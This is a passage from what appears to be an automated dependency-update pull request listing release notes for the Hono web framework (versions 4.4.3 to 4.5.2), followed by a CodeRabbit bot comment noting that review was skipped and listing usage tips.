[https://github.com/honojs/hono/pull/3138](https://redirect.github.com/honojs/hono/pull/3138) - fix:(csrf) fix typo of csrf middleware by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3178](https://redirect.github.com/honojs/hono/pull/3178) - feat(secure-headers): remove "X-Powered-By" should be an option by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/3177](https://redirect.github.com/honojs/hono/pull/3177) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.1...v4.5.2 ### [`v4.5.1`](https://redirect.github.com/honojs/hono/releases/tag/v4.5.1) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.5.0...v4.5.1) #### What's Changed - chore: remove rimraf and use bun shell by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3146](https://redirect.github.com/honojs/hono/pull/3146) - chore: moving the setup file of vitest by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/3157](https://redirect.github.com/honojs/hono/pull/3157) - fix(middleware/jwt): Changed the jwt-secret type to SignatureKey by [@​JulesVerner](https://redirect.github.com/JulesVerner) in [https://github.com/honojs/hono/pull/3167](https://redirect.github.com/honojs/hono/pull/3167) - feat(bearer-auth): Allow empty bearer-auth middleware prefixes by [@​prevostc](https://redirect.github.com/prevostc) in [https://github.com/honojs/hono/pull/3161](https://redirect.github.com/honojs/hono/pull/3161) - chore(factory): remove `@experimental` from `createApp` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3164](https://redirect.github.com/honojs/hono/pull/3164) - fix(client): support array values for `query` in `ws` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3169](https://redirect.github.com/honojs/hono/pull/3169) - fix(validator): ignore content-type mismatches by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3165](https://redirect.github.com/honojs/hono/pull/3165) #### New Contributors - [@​JulesVerner](https://redirect.github.com/JulesVerner) made their first contribution in [https://github.com/honojs/hono/pull/3167](https://redirect.github.com/honojs/hono/pull/3167) - [@​prevostc](https://redirect.github.com/prevostc) made their first contribution in [https://github.com/honojs/hono/pull/3161](https://redirect.github.com/honojs/hono/pull/3161) **Full Changelog**: https://github.com/honojs/hono/compare/v4.5.0...v4.5.1 ### [`v4.5.0`](https://redirect.github.com/honojs/hono/compare/v4.4.13...v4.5.0) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.13...v4.5.0) ### [`v4.4.13`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.13) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.12...v4.4.13) ##### What's Changed - chore: update benchmark by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3102](https://redirect.github.com/honojs/hono/pull/3102) - chore: replace tsx with Bun by [@​nakasyou](https://redirect.github.com/nakasyou) in [https://github.com/honojs/hono/pull/3103](https://redirect.github.com/honojs/hono/pull/3103) - refactor(http-status): remove unnecessary line of types and use common types by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/3110](https://redirect.github.com/honojs/hono/pull/3110) - fix(jsx): redefine scope attribute as enum type by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3118](https://redirect.github.com/honojs/hono/pull/3118) - fix(types): allow `string[] | File[]` for RPC form value by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3117](https://redirect.github.com/honojs/hono/pull/3117) - fix(validator-types): type Alignment with Web Standards by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/3120](https://redirect.github.com/honojs/hono/pull/3120) - fix(types): `app.use(path, mw)` return correct schema type by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3128](https://redirect.github.com/honojs/hono/pull/3128) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.12...v4.4.13 ### [`v4.4.12`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.12) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.11...v4.4.12) #### What's Changed - fix(aws-lambda): set cookies with comma is bugged by [@​NamesMT](https://redirect.github.com/NamesMT) in [https://github.com/honojs/hono/pull/3084](https://redirect.github.com/honojs/hono/pull/3084) - fix(types): infer `path` when chaining after `use` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3087](https://redirect.github.com/honojs/hono/pull/3087) - chore: update outdated links in JSDoc by [@​ryuapp](https://redirect.github.com/ryuapp) in [https://github.com/honojs/hono/pull/3089](https://redirect.github.com/honojs/hono/pull/3089) - fix(jsx): changes behavior when `download` attribute is set to a boolean value. by [@​oon00b](https://redirect.github.com/oon00b) in [https://github.com/honojs/hono/pull/3094](https://redirect.github.com/honojs/hono/pull/3094) - chore: add the triage label by [@​mvares](https://redirect.github.com/mvares) in [https://github.com/honojs/hono/pull/3092](https://redirect.github.com/honojs/hono/pull/3092) - feat(types): improve JSONParsed by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3074](https://redirect.github.com/honojs/hono/pull/3074) - fix(helper/streaming): remove slow types by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3100](https://redirect.github.com/honojs/hono/pull/3100) - chore(utils/jwt): add `@module` docs by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3101](https://redirect.github.com/honojs/hono/pull/3101) #### New Contributors - [@​oon00b](https://redirect.github.com/oon00b) made their first contribution in [https://github.com/honojs/hono/pull/3094](https://redirect.github.com/honojs/hono/pull/3094) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.11...v4.4.12 ### [`v4.4.11`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.11) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.10...v4.4.11) #### What's Changed - refactor: remove unnecessary async keyword from router tests by [@​K-tecchan](https://redirect.github.com/K-tecchan) in [https://github.com/honojs/hono/pull/3061](https://redirect.github.com/honojs/hono/pull/3061) - fix(validator): don't return a FormData if formData is cached by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3067](https://redirect.github.com/honojs/hono/pull/3067) - fix(client): Add Query Parameter Support to WebSocket Client in `hono/client` by [@​naporin0624](https://redirect.github.com/naporin0624) in [https://github.com/honojs/hono/pull/3066](https://redirect.github.com/honojs/hono/pull/3066) - refactor(types): move `HandlerInterface`'s `(path, handler)`s overloads down by [@​NamesMT](https://redirect.github.com/NamesMT) in [https://github.com/honojs/hono/pull/3072](https://redirect.github.com/honojs/hono/pull/3072) - test(helper/dev): fix typo of test case name by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3073](https://redirect.github.com/honojs/hono/pull/3073) - fix(stream): Fixed a problem that onAbort() is called even if request is normally closed in deno by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3079](https://redirect.github.com/honojs/hono/pull/3079) #### New Contributors - [@​K-tecchan](https://redirect.github.com/K-tecchan) made their first contribution in [https://github.com/honojs/hono/pull/3061](https://redirect.github.com/honojs/hono/pull/3061) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.10...v4.4.11 ### [`v4.4.10`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.10) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.9...v4.4.10) #### What's Changed - chore(jsr): export JWT utils by [@​ryuapp](https://redirect.github.com/ryuapp) in [https://github.com/honojs/hono/pull/3056](https://redirect.github.com/honojs/hono/pull/3056) - fix(streaming): call stream.abort() explicitly when request is aborted by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/3042](https://redirect.github.com/honojs/hono/pull/3042) - fix(client): set Path as the default of Original by [@​m-shaka](https://redirect.github.com/m-shaka) in [https://github.com/honojs/hono/pull/3058](https://redirect.github.com/honojs/hono/pull/3058) #### New Contributors - [@​m-shaka](https://redirect.github.com/m-shaka) made their first contribution in [https://github.com/honojs/hono/pull/3058](https://redirect.github.com/honojs/hono/pull/3058) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.9...v4.4.10 ### [`v4.4.9`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.9) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.8...v4.4.9) #### What's Changed - perf(context): improve initializing `Context` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3046](https://redirect.github.com/honojs/hono/pull/3046) - fix(types): correct inferring env when routes channing by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3051](https://redirect.github.com/honojs/hono/pull/3051) - docs: update the description of `package.json` and README by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3052](https://redirect.github.com/honojs/hono/pull/3052) - fix(timing): prevent duplicate applications by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3054](https://redirect.github.com/honojs/hono/pull/3054) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.8...v4.4.9 ### [`v4.4.8`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.8) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.7...v4.4.8) #### What's Changed - fix(jsx): add an explicit type by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3007](https://redirect.github.com/honojs/hono/pull/3007) - ci: use `env` for codecov GitHub Actions by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/3010](https://redirect.github.com/honojs/hono/pull/3010) - chore: Fix typos in JSDoc by [@​NicoPlyley](https://redirect.github.com/NicoPlyley) in [https://github.com/honojs/hono/pull/3002](https://redirect.github.com/honojs/hono/pull/3002) - fix: change to allow use of websocket options by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/2999](https://redirect.github.com/honojs/hono/pull/2999) - perf: parseAccept without spread operator by [@​Jayllyz](https://redirect.github.com/Jayllyz) in [https://github.com/honojs/hono/pull/3003](https://redirect.github.com/honojs/hono/pull/3003) - test: add tests for buffer.ts by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3004](https://redirect.github.com/honojs/hono/pull/3004) - chore: upload bun test coverage to CodeCov by [@​exoego](https://redirect.github.com/exoego) in [https://github.com/honojs/hono/pull/3022](https://redirect.github.com/honojs/hono/pull/3022) - refactor: remove unneeded import statements by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/3014](https://redirect.github.com/honojs/hono/pull/3014) - perf(utils/buffer): use promise all for better performance by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/3031](https://redirect.github.com/honojs/hono/pull/3031) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.7...v4.4.8 ### [`v4.4.7`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.7) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.6...v4.4.7) #### What's Changed - use correct return type for c.html depending on input by [@​asmadsen](https://redirect.github.com/asmadsen) in [https://github.com/honojs/hono/pull/2973](https://redirect.github.com/honojs/hono/pull/2973) - test: test uncovered return statement by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/2985](https://redirect.github.com/honojs/hono/pull/2985) - test: Update request.test.ts to remove duplicate checks by [@​JoaquimLey](https://redirect.github.com/JoaquimLey) in [https://github.com/honojs/hono/pull/2984](https://redirect.github.com/honojs/hono/pull/2984) - fix(types): env variables override ContextVariableMap by [@​KaelWD](https://redirect.github.com/KaelWD) in [https://github.com/honojs/hono/pull/2987](https://redirect.github.com/honojs/hono/pull/2987) #### New Contributors - [@​asmadsen](https://redirect.github.com/asmadsen) made their first contribution in [https://github.com/honojs/hono/pull/2973](https://redirect.github.com/honojs/hono/pull/2973) - [@​JoaquimLey](https://redirect.github.com/JoaquimLey) made their first contribution in [https://github.com/honojs/hono/pull/2984](https://redirect.github.com/honojs/hono/pull/2984) - [@​KaelWD](https://redirect.github.com/KaelWD) made their first contribution in [https://github.com/honojs/hono/pull/2987](https://redirect.github.com/honojs/hono/pull/2987) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.6...v4.4.7 ### [`v4.4.6`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.6) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.5...v4.4.6) ##### What's Changed - fix(aws-lambda): handle multiple cookies in streaming responses by [@​KnisterPeter](https://redirect.github.com/KnisterPeter) in [https://github.com/honojs/hono/pull/2926](https://redirect.github.com/honojs/hono/pull/2926) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.5...v4.4.6 ### [`v4.4.5`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.5) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.4...v4.4.5) ##### What's Changed - fix(cors): allow custom vary header by [@​fzn0x](https://redirect.github.com/fzn0x) in [https://github.com/honojs/hono/pull/2934](https://redirect.github.com/honojs/hono/pull/2934) - fix(jsx): rename `Hono` to `JSX` and export `JSX` namespace by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2937](https://redirect.github.com/honojs/hono/pull/2937) - refactor(hono-base): make 2nd arg of `app.route()` required by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2945](https://redirect.github.com/honojs/hono/pull/2945) - refactor(hono-base): don't check 1st argument of `app.on()` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2946](https://redirect.github.com/honojs/hono/pull/2946) - refactor(context): remove unnecessary initialization add add tests for Context by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2949](https://redirect.github.com/honojs/hono/pull/2949) - test(hono-base): add tests for covering 100% by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2952](https://redirect.github.com/honojs/hono/pull/2952) - fix(context): default JSONRespond and TextRespond StatusCode generic arg by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/2954](https://redirect.github.com/honojs/hono/pull/2954) - refactor(request): shorten `parseBody` and remove unnecessary check by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2947](https://redirect.github.com/honojs/hono/pull/2947) - refactor(jsx): reduce code size and improve maintainability by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/2956](https://redirect.github.com/honojs/hono/pull/2956) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.4...v4.4.5 ### [`v4.4.4`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.4) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.3...v4.4.4) #### What's Changed - fix(typo): Fix typo in request.test.ts by [@​yasuaki640](https://redirect.github.com/yasuaki640) in [https://github.com/honojs/hono/pull/2899](https://redirect.github.com/honojs/hono/pull/2899) - feat(hono-base): skip import HTTPException by using HTTPResponseError by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/2898](https://redirect.github.com/honojs/hono/pull/2898) - chore: improve unfinalized response error by [@​Cherry](https://redirect.github.com/Cherry) in [https://github.com/honojs/hono/pull/2902](https://redirect.github.com/honojs/hono/pull/2902) - chore: create .gitpod.yml by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/2868](https://redirect.github.com/honojs/hono/pull/2868) - fix(cloudflare-workers): export getConnInfo() by [@​ryuapp](https://redirect.github.com/ryuapp) in [https://github.com/honojs/hono/pull/2906](https://redirect.github.com/honojs/hono/pull/2906) - fix(hono-base): return 404 if lacking response in a single sync handler by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2909](https://redirect.github.com/honojs/hono/pull/2909) - refactor: remove `Prettify` as duplicated with `Simplify` by [@​NamesMT](https://redirect.github.com/NamesMT) in [https://github.com/honojs/hono/pull/2914](https://redirect.github.com/honojs/hono/pull/2914) - fix(types): [#​2912](https://redirect.github.com/honojs/hono/issues/2912): interfaces array's respond typed as `never` by [@​NamesMT](https://redirect.github.com/NamesMT) in [https://github.com/honojs/hono/pull/2915](https://redirect.github.com/honojs/hono/pull/2915) - feat(context): `c.redirect()` supports `TypedResponse` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2908](https://redirect.github.com/honojs/hono/pull/2908) - feat(jsx): support htmlfor attribute alias by [@​akira-tsuno](https://redirect.github.com/akira-tsuno) in [https://github.com/honojs/hono/pull/2916](https://redirect.github.com/honojs/hono/pull/2916) - fix(filepath): allow suffix includes `-` and `_` by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2910](https://redirect.github.com/honojs/hono/pull/2910) - fix(types): add `_` prefix to `TypedResponse` properties by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2917](https://redirect.github.com/honojs/hono/pull/2917) - fix(types): `SimplifyDeepArray` should now actually be "deep" by [@​NamesMT](https://redirect.github.com/NamesMT) in [https://github.com/honojs/hono/pull/2920](https://redirect.github.com/honojs/hono/pull/2920) - refactor(middleware/serve-static): call getContent only once if the file does not exist by [@​usualoma](https://redirect.github.com/usualoma) in [https://github.com/honojs/hono/pull/2922](https://redirect.github.com/honojs/hono/pull/2922) - chore: add `text` and `html` for coverage reporter by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2923](https://redirect.github.com/honojs/hono/pull/2923) - refactor(conninfo): create `types.ts` for type definitions by [@​yusukebe](https://redirect.github.com/yusukebe) in [https://github.com/honojs/hono/pull/2924](https://redirect.github.com/honojs/hono/pull/2924) #### New Contributors - [@​yasuaki640](https://redirect.github.com/yasuaki640) made their first contribution in [https://github.com/honojs/hono/pull/2899](https://redirect.github.com/honojs/hono/pull/2899) - [@​Cherry](https://redirect.github.com/Cherry) made their first contribution in [https://github.com/honojs/hono/pull/2902](https://redirect.github.com/honojs/hono/pull/2902) - [@​akira-tsuno](https://redirect.github.com/akira-tsuno) made their first contribution in [https://github.com/honojs/hono/pull/2916](https://redirect.github.com/honojs/hono/pull/2916) **Full Changelog**: https://github.com/honojs/hono/compare/v4.4.3...v4.4.4 ### [`v4.4.3`](https://redirect.github.com/honojs/hono/releases/tag/v4.4.3) [Compare Source](https://redirect.github.com/honojs/hono/compare/v4.4.2...v4.4.3) #### What's Changed - ci: Update workflow name of release.yml by [@​siguici](https://redirect.github.com/siguici) in [https://github.com/honojs/hono/pull/2874](https://redirect.github.com/honojs/hono/pull/2874) - refactor: removed unnecessary line by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/2869](https://redirect.github.com/honojs/hono/pull/2869) - ci: change name of workflow jobs by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/2875](https://redirect.github.com/honojs/hono/pull/2875) - docs(jsdoc): add jsdoc of some modules by [@​EdamAme-x](https://redirect.github.com/EdamAme-x) in [https://github.com/honojs/hono/pull/2836](https://re

[coderabbitai[bot]]

[!IMPORTANT]

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

---

🪧 Tips

### Chat There are 3 ways to chat with [CodeRabbit](https://coderabbit.ai): - Review comments: Directly reply to a review comment made by CodeRabbit. Example: - `I pushed a fix in commit , please review it.` - `Generate unit testing code for this file.` - `Open a follow-up GitHub issue for this discussion.` - Files and specific lines of code (under the "Files changed" tab): Tag `@coderabbitai` in a new review comment at the desired location with your query. Examples: - `@coderabbitai generate unit testing code for this file.` - `@coderabbitai modularize this function.` - PR comments: Tag `@coderabbitai` in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples: - `@coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.` - `@coderabbitai read src/utils.ts and generate unit testing code.` - `@coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.` - `@coderabbitai help me debug CodeRabbit configuration file.` Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments. ### CodeRabbit Commands (Invoked using PR comments) - `@coderabbitai pause` to pause the reviews on a PR. - `@coderabbitai resume` to resume the paused reviews. - `@coderabbitai review` to trigger an incremental review. This is useful when automatic reviews are disabled for the repository. - `@coderabbitai full review` to do a full review from scratch and review all the files again. - `@coderabbitai summary` to regenerate the summary of the PR. - `@coderabbitai resolve` resolve all the CodeRabbit review comments. - `@coderabbitai configuration` to show the current CodeRabbit configuration for the repository. - `@coderabbitai help` to get help. ### Other keywords and placeholders - Add `@coderabbitai ignore` anywhere in the PR description to prevent this PR from being reviewed. - Add `@coderabbitai summary` to generate the high-level summary at a specific location in the PR description. - Add `@coderabbitai` anywhere in the PR title to generate the title automatically. ### CodeRabbit Configuration File (`.coderabbit.yaml`) - You can programmatically configure CodeRabbit by adding a `.coderabbit.yaml` file to the root of your repository. - Please see the [configuration documentation](https://docs.coderabbit.ai/guides/configure-coderabbit) for more information. - If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: `# yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json` ### Documentation and Community - Visit our [Documentation](https://coderabbit.ai/docs) for detailed information on how to use CodeRabbit. - Join our [Discord Community](http://discord.gg/coderabbit) to get help, request features, and share feedback. - Follow us on [X/Twitter](https://twitter.com/coderabbitai) for updates and announcements.